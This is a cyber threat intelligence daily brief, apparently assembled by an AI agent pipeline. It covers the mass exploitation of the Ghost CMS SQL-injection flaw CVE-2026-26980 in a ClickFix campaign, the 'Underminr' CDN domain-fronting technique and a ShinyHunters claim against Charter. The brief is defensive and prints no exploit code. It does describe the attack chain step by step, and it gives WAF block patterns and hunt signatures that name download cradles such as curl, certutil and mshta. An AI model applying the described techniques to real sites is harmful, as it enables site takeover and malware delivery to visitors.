CTI Daily Brief — 2026-05-25

0. TL;DR

Ghost CMS SQL-injection flaw CVE-2026-26980 (CVSS 9.4, unauthenticated) is being mass-exploited in a large-scale ClickFix campaign — XLab/Qianxin documented 700+ compromised self-hosted Ghost sites (including Harvard, Oxford and Auburn university portals and DuckDuckGo); attackers extract the admin API key via blind SQLi, inject JavaScript that serves visitors a fake-Cloudflare "verify you are human" lure, and drop loaders/stealers on those who paste the supplied command. Affected 3.24.0–6.19.0; fixed in 6.19.1 (BleepingComputer, 2026-05-24).
"Underminr" is a new domain-fronting variant that defeats DNS-layer filtering on multi-tenant CDNs — ADAMnetworks showed an attacker can present an allow-listed domain's SNI/Host while the shared CDN edge routes the request to a different tenant's (attacker) origin on the same IP, blinding DNS filtering and edge-terminated TLS inspection. No CVE (architectural); ~88M domains on shared infrastructure are potentially in scope (SecurityWeek, 2026-05-23).
ShinyHunters listed Charter Communications (Spectrum), claiming 42M records with a 27 May deadline — a fresh victim in the Salesforce-credential campaign tracked here via 7-Eleven (2026-05-19), and by our own tracking its first telco/ISP victim to respond publicly. Charter denies any "sensitive PI or CPNI" exfiltration, a denial calibrated to FCC categories; the 42M figure is the actor's unverified claim (CyberInsider, 2026-05-23).

1. Active Threats, Trending Actors, Notable Incidents & Disclosures

Large-scale ClickFix campaign mass-compromises self-hosted Ghost CMS sites via CVE-2026-26980

XLab researchers at Qianxin documented an active, large-scale campaign weaponising the unauthenticated SQL-injection flaw CVE-2026-26980 against self-hosted Ghost CMS instances, with more than 700 compromised domains observed — among them university portals (Harvard, Oxford and Auburn are named), AI/SaaS companies, media outlets, fintech firms, security sites and personal blogs, plus DuckDuckGo (BleepingComputer, 2026-05-24; XLab Qianxin, 2026-05-21). The intrusion is a two-stage operation: the attacker first exploits the pre-auth SQLi in Ghost's Content API to read the admin API key out of the database, then uses that key — which carries full content-management scope — to inject a lightweight JavaScript loader into published articles. The loader pulls a second-stage cloaking script that fingerprints each visitor; those who qualify are served a fake Cloudflare "verify you are human" prompt in an iframe overlaid on the article (the ClickFix / FakeCaptcha pattern) instructing them to paste a supplied command into the Windows Run dialog, which drops DLL loaders, JavaScript droppers, or an Electron-based sample (UtilifySetup.exe) (BleepingComputer, 2026-05-24).

Why it matters to us: self-hosted Ghost is used across EU/CH universities, NGOs and independent media — exactly the named victim profile — and the campaign weaponises a flaw patched back in February (6.19.1) against the still-unpatched long tail. The threat is two-sided: site operators face server-side compromise and admin-key theft (rotate the key and audit posts/themes for injected <script> even after patching, per § 2 and § 5), while every visitor to a compromised site is a ClickFix target. The client-side execution chain is the higher-value, product-agnostic hunt — cmd.exe / powershell.exe spawned from a browser process tree following a Run-dialog paste — and is worth hunting regardless of whether you run Ghost (see § 5).

2. Trending Vulnerabilities

CVE-2026-26980 — Ghost CMS Content API: unauthenticated blind SQL injection in the `slug` filter, actively exploited

CVE-2026-26980 is an unauthenticated SQL injection (CWE-89) scored CVSS 9.4 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L) in Ghost's Content API. The defect sits in the handling of the slug filter parameter, which is interpolated into a raw SQL fragment without parameterisation; a remote attacker with no authentication can perform boolean-based blind extraction of arbitrary database contents — critically the admin API key, which then grants full content-management scope over articles, themes and users (GitHub Security Advisory GHSA-w52v-v783-gw97). Affected versions span Ghost 3.24.0 through 6.19.0 (a roughly three-year release range); the fix shipped in 6.19.1 on 19 February 2026. Ghost(Pro) cloud instances were patched server-side; self-hosted operators must upgrade themselves, which is the exposed long tail the current campaign targets (BleepingComputer, 2026-05-24).

The CVE clears the § 2 bar on exploitation: SentinelOne documented in-the-wild exploitation as early as 27 February, and XLab confirmed the present large-scale wave (700+ compromised domains) on 21 May (XLab Qianxin, 2026-05-21). Mitigation: upgrade to 6.19.1 or later. Interim compensating controls — block Content API requests whose query string contains slug:[ (URL-encoded slug%3A%5B) at the WAF and restrict or disable the public Content API to trusted origins; the vendor mitigation targets exactly that request pattern. Because the admin API key is the exfiltration target, treat it as compromised on any exposed instance and rotate it after patching, then audit posts and themes for injected JavaScript. Full kill chain and detection in § 5.

CVE Summary Table

CVE	Product	CVSS	EPSS	KEV	Exploited	Patch	Source
CVE-2026-26980	Ghost CMS (Content API)	9.4	n/a	No	Yes (ITW, 700+ sites)	v6.19.1	GHSA-w52v-v783-gw97

3. Research & Investigative Reporting

"Underminr": a multi-tenant-CDN domain-fronting variant that blinds DNS-layer filtering

ADAMnetworks disclosed Underminr, a structural evolution of domain fronting that abuses the shared-IP, multi-tenant architecture of modern CDN edges rather than a single-CDN misconfiguration (ADAMnetworks, 2026-05-21). Classic domain fronting — overriding the HTTP Host header behind a permitted SNI — was largely closed by the major CDNs in 2021–2022 by enforcing SNI/Host consistency. Underminr instead presents the SNI and HTTP Host of a legitimate, allow-listed domain hosted on a shared edge while forcing the request to the IP of a different tenant — the attacker's origin — on the same edge, exploiting the fact that the CDN's internal tenant routing is decoupled from the network-visible Host/SNI (SecurityWeek, 2026-05-23). As SecurityWeek frames it, "the detection gap appears when DNS decisions, edge IPs, SNI, Host headers, and CDN tenant routing are not correlated." No CVE was assigned — this is an architectural property of shared-edge multi-tenancy, not a software bug. SecurityWeek reports roughly 88 million domains on shared infrastructure are potentially in scope, with US, UK and Canadian infrastructure most affected; the technique does not require compromising the legitimate domain, only co-tenancy on the same edge IP range.

Why it matters to us: this maps to ATT&CK T1090.004 (Proxy: Domain Fronting) and is squarely a C2 / exfiltration-evasion concern for the many CH/EU public-sector networks whose egress control leans on DNS-layer filtering (DNS RPZ, recursive-resolver allow-lists) or that treat a CDN's published IP range as a proxy for the actual destination — both of which Underminr defeats, because the FQDN legitimately resolves to the shared edge IP and edge-terminated TLS inspection never sees the origin-routing decision. Defenders should stop treating DNS/domain allow-listing as a sufficient egress control on its own; correlate SNI, Host, the resolved edge IP and (where available) CDN tenant identity per flow, and prefer per-flow identity verification (ZTNA) over perimeter-DNS-filter trust. Specific vulnerable CDN providers are not named in the public reporting.

4. Updates to Prior Coverage

UPDATE: ShinyHunters lists Charter Communications (Spectrum) — telco victim in the Salesforce-credential campaign

UPDATE (Salesforce-credential extortion campaign, originally covered 2026-05-19 via the 7-Eleven breach): ShinyHunters listed Charter Communications — operating consumer services under the Spectrum brand — on its leak site around 22–23 May, claiming over 42 million PII records and setting a 27 May negotiation deadline before threatened release (CyberInsider, 2026-05-23). The 42M figure is the actor's own unverified leak-site claim. Charter issued a narrowly-worded statement confirming it is "following security protocols" and "alerting appropriate authorities" while explicitly denying that "sensitive personal information (PI) or customer proprietary network information (CPNI)" was exfiltrated — language calibrated to FCC-protected categories. The exclusion of non-CPNI PII (billing name, address, email) from that denial is conspicuous and leaves room for lower-sensitivity data exposure even if the denial holds.

By our own campaign tracking Charter is the first telco/ISP victim of this wave to respond publicly — an inference from the prior named victims (Instructure, Vimeo, Wynn, Vercel, Medtronic, 7-Eleven), none of them telcos, rather than a claim made by the cited sources. The pattern is consistent with the broader ShinyHunters wave against enterprise Salesforce tenants — abuse of exposed OAuth tokens and misconfigured connected-app / Experience Cloud integrations, not a vulnerability in Salesforce itself — the same vector behind the confirmed 7-Eleven breach (600k records, covered 2026-05-19). The fresh Charter listing is independently corroborated by Troy Hunt's Weekly Update 505, 2026-05-24, which records ShinyHunters' new claimed victims. For CH/EU public bodies running Salesforce: audit connected-app OAuth scopes, rotate long-lived connected-app credentials, restrict Experience/Community Cloud guest-user access, and baseline bulk-object query volumes via Shield Event Monitoring — an anomalous large SELECT against Account/Contact objects is the data-exfiltration signature to alert on.

5. Deep Dive — Ghost CMS CVE-2026-26980 → ClickFix: the CMS-compromise-to-endpoint kill chain

Background. CVE-2026-26980 was disclosed and patched in Ghost 6.19.1 on 19 February 2026, and SentinelOne reported in-the-wild exploitation and detection guidance by 27 February (BleepingComputer, 2026-05-24). The May activity XLab documented is not a new bug but a large-scale weaponisation of the unpatched long tail of self-hosted instances, repurposing compromised editorial sites as a high-traffic, low-attributable delivery surface for ClickFix social engineering (XLab Qianxin, 2026-05-21). ClickFix / FakeCaptcha — tricking a user into pasting an attacker-supplied command into the Run dialog or a terminal — has been a tracked initial-access technique since 2024; what is notable here is the combination of a CVSS-9.4 pre-auth CMS flaw as the distribution mechanism with a fingerprinting/cloaking stage that keeps the lure invisible to non-targets and to casual review.

Kill chain → MITRE ATT&CK.

Initial access — T1190 Exploit Public-Facing Application. Unauthenticated boolean-based blind SQL injection through the Content API's slug filter parameter. No credentials, no user interaction — the request pattern the vendor mitigation keys on is a query string containing slug:[ (slug%3A%5B).
Credential access — T1552 Unsecured Credentials. The injection is used to read the admin API key out of Ghost's database. This key is a bearer token with full content-management scope, so its theft is the privilege pivot — there is no separate authentication step after extraction.
Content injection / defacement — T1659 Content Injection. With the admin key the attacker injects a lightweight JavaScript loader into published articles and/or theme templates, so the malicious code is served to every visitor from the site's own trusted origin.
Execution-guardrails cloaking — T1480 Execution Guardrails. The loader fetches a second-stage cloaking script that fingerprints each visitor and only proceeds for those matching the target profile (e.g. Windows desktop), so most visitors and most analysts never see the lure.
User execution — T1204.002 User Execution: Malicious File, chained to T1059.001 PowerShell / T1059.003 Windows Command Shell. Qualifying visitors are shown a fake Cloudflare "verify you are human" prompt in an overlay iframe instructing them to paste a supplied command into the Windows Run dialog (Win+R) or a terminal.
Payload delivery — T1105 Ingress Tool Transfer. The pasted command pulls follow-on payloads; XLab observed DLL loaders, JavaScript droppers, and an Electron-based sample named UtilifySetup.exe, leading to info-stealer / RAT capability.

Detection concepts (no IOCs). Two distinct hunt surfaces:

Server-side, for Ghost operators. Review web-server / reverse-proxy access logs for Content API requests to /ghost/api/content/ whose filter/slug parameter contains slug:[ (slug%3A%5B) or boolean-blind SQL artefacts (AND, CASE, time-delay primitives) — the vendor mitigation pattern is the highest-fidelity signal. In the Ghost admin audit trail, alert on unexpected article or theme modifications, and on any <script> element appearing in post content or theme files that has no editorial counterpart.
Client-side, for everyone (the product-agnostic, higher-value hunt). The ClickFix execution chain is independent of Ghost and is the artefact most defenders can actually catch: Sysmon Event ID 1 / Windows 4688 for cmd.exe or powershell.exe (especially with -EncodedCommand, clipboard-paste context, mshta, curl/certutil download cradles) whose parent process is a browser (chrome.exe, msedge.exe, firefox.exe, brave.exe) or explorer.exe immediately following a Win+R Run-dialog launch. Flag execution of unsigned Electron applications from user-writable paths. Enable PowerShell Script Block Logging (Event ID 4104) to capture the pasted stager body.

Hardening / mitigation.

Ghost: upgrade to 6.19.1 or later; until then block slug:[ / slug%3A%5B at the WAF and restrict the public Content API to trusted origins. Assume the admin API key was stolen on any internet-exposed instance — rotate it after patching and audit all posts and theme files for injected scripts.
Endpoint (the ClickFix surface, applies broadly): where operationally feasible, disable the Win+R Run dialog for standard users via the NoRun policy (GPO), deploy detection for clipboard-to-shell execution, and run user-awareness that any web page asking you to "paste this command to prove you are human" is an attack. Constrained Language Mode plus full PowerShell logging reduces the blast radius of a successful paste.

6. Action Items

Patch self-hosted Ghost CMS to 6.19.1+ now if internet-exposed — interim, block Content API requests containing slug:[ (slug%3A%5B) at the WAF and restrict the public Content API to trusted origins. Then rotate the Ghost admin API key (assume theft on any exposed instance) and audit posts/themes for injected <script> (§ 2, § 5) (GHSA-w52v-v783-gw97).
Hunt the ClickFix execution chain regardless of whether you run Ghost — cmd.exe/powershell.exe spawned from browser process trees or from explorer.exe after a Win+R launch (Sysmon EID 1 / Windows 4688), unsigned Electron apps from user-writable paths; enable PowerShell Script Block Logging (4104); brief users that "paste this to verify you are human" is an attack (§ 5) (XLab Qianxin, 2026-05-21).
Stop treating DNS / domain allow-listing as a sufficient egress control — Underminr defeats DNS-layer filtering and CDN-IP-range trust on multi-tenant edges; correlate SNI, Host, resolved edge IP and CDN tenant per flow, and move toward per-flow identity (ZTNA) for high-value egress paths (§ 3) (SecurityWeek, 2026-05-23).
If you run Salesforce, harden connected apps — audit OAuth app scopes, rotate long-lived connected-app credentials, restrict Experience/Community Cloud guest access, and baseline bulk-object query volumes via Shield Event Monitoring; an anomalous large SELECT on Account/Contact is the exfiltration signature (§ 4) (CyberInsider, 2026-05-23).

7. Verification Notes

Items dropped (with reason):
- Laravel-Lang / Packagist supply-chain attack (surfaced by S1, S2 and S3) — already the deep dive in the 2026-05-24 brief (both the autoloader-backdoor strand and the eight-package postinstall strand); no material in-window delta. PD-8 duplicate. Note: S2's findings additionally carried the attacker C2 domain and VirusTotal payload hashes — excluded per the no-IOC policy regardless of the dedup.
- Exim "Dead.Letter" CVE-2026-45185 (S2) — unauthenticated BDAT use-after-free in Exim 4.97–4.99.2 GnuTLS builds (the default MTA on Debian/Ubuntu) with possible RCE, fixed in 4.99.3. Operationally significant for EU public-sector self-hosted mail, but the freshest source is XBOW/THN/NCSC-NL dated 2026-05-12 to 2026-05-15 — roughly 10 days outside the 36h window with no fresh in-window development. Held as out-of-window; flagged for catch-up if confirmed ITW exploitation or a mass-scanning report lands in window.
- Stormshield SNS DoS CVE-2025-9086 / CERTFR-2026-AVI-0631 (S2) — remote denial-of-service only, no code-execution path, no exploitation; already assessed and dropped in the 2026-05-24 § 7, and out-of-window (2026-05-21/22). Below the § 2 inclusion gate.
- GLPI CVE-2026-32312 / CVE-2026-42320 / CERTFR-2026-AVI-0609 (S2) — moderate severity (CVSS 5.1 / 5.9), both post-authentication, no exploitation; out-of-window (2026-05-18/19). Strong CH/EU public-sector ITSM footprint noted, but below the § 2 inclusion gate.
- Cloud Atlas PowerCloud / VBCloud (S3) — Kaspersky Securelist, 2026-05-22; targeting is Russian/Belarusian government, CH/EU nexus is speculative, and the source is out-of-window. Dropped on nexus + recency.
- The Oncology Institute SEC Item 1.05 8-K (S4) — US/indirect nexus, [SINGLE-SOURCE] (SEC filing plus aggregator), out-of-window (2026-05-22); already assessed and dropped in the 2026-05-24 § 7.
Contradiction resolved (Ghost CMS versions/component): S1 and S3 both surfaced CVE-2026-26980 but disagreed — S1 reported affected 3.24.0–6.19.0 / fixed 6.19.1 / Content API slug filter; S3 reported affected < 5.84.0 / fixed 5.84.0 / ORDER BY clause. The authoritative TryGhost advisory GHSA-w52v-v783-gw97 confirms S1 (affected 3.24.0–6.19.0, fixed 6.19.1, unauthenticated SQLi in the Content API slug filter, CVSS 9.4). S3's version and component details were incorrect and were not used.
URL corrections: both sub-agents' BleepingComputer URLs for the Ghost story 404'd on direct fetch (/ghost-cms-vulnerability-exploited-to-hack-sites-spread-malware/ and /ghost-blogging-platform-hacked-to-push-clickfix-via-sql-injection/); replaced with the verified in-window article /ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/ (2026-05-24). S3's XLab URL was the correct one and is used as a primary.
Reduced confidence / window edge: Underminr (§ 3) — the freshest source (SecurityWeek, 2026-05-23 ~11:00 UTC) sits ~5 h outside the strict 36 h window but inside the 72 h developing window; included as substantive novel network-evasion research directly relevant to CH/EU DNS-filtering egress architectures. The ADAMnetworks primary is 2026-05-21. Specific vulnerable CDN providers are not named in the public reporting and are not asserted here.
Leak-site claim (Charter, § 4): ShinyHunters' 42M-record figure is the actor's unverified leak-site assertion, presented as such; corroborated by Charter's own public statement (a partial denial confirming an incident) and Troy Hunt Weekly 505 (2026-05-24, which corroborates the fresh victim listing, not the Salesforce vector). The campaign-continuity link to 7-Eleven, and the "first telco/ISP victim to respond publicly" characterisation, are our own campaign-tracking assessments (inferred from the prior named victims, none of them telcos), not attributions or claims made by the cited sources.
Single-source items in §§ 1–5: none — all included items carry ≥2 independent sources (Ghost: vendor advisory + research lab + news; Underminr: vendor primary + journalism; Charter: victim statement + journalism).
Main-agent model self-identification: the runtime self-identification env vars (CLAUDE_FRIENDLY_NAME / CLAUDE_MODEL_ID) were unset and the routine configuration withheld the main-agent model identifier from committed artefacts this run; recorded as "specific model not determined" in the AI-content notice and unknown in state/run_log.json per the prompt's fallback. Sub-agent models (Claude Sonnet 4.6) and the verifier model are recorded verbatim as self-reported.
Candidate sources: surfaced this run — xbow-security (S2), xlab-qianxin (S3), aikido-security (S1/S3), adamnetworks (S3). Added one per the one-per-run cap: xlab-qianxin (Qianxin X-Lab — primary discoverer of the in-window Ghost CMS exploitation wave; contributed two cited items today). The others are held as overflow for a future run.
Stalled sub-agents: none — S1–S4 all returned within the 30-minute budget.
Coverage gaps: sophos-xops (HTTP 503, 5th consecutive run); trendmicro-research (no in-window publications); inside-it-ch (Cloudflare challenge on bridge + no usable Wayback snapshot, 4th consecutive run); databreaches-net (HTTP 403, no targeted article URLs); cisco-psirt (PSIRT RSS 404, no in-window advisories via search); cisa-kev (latest update 2026-05-22, outside window); cert-eu (no advisory in window, latest 2026-006); cert-fr-actu (feed stalled since 2025); mandiant-gtig, dfirreport (no in-window items); ico-uk, cnil-fr, edpb (no in-window enforcement actions); sec-disclosures-edgar (filing index pages 403, content via search/aggregators).

On this page

CVE Summary Table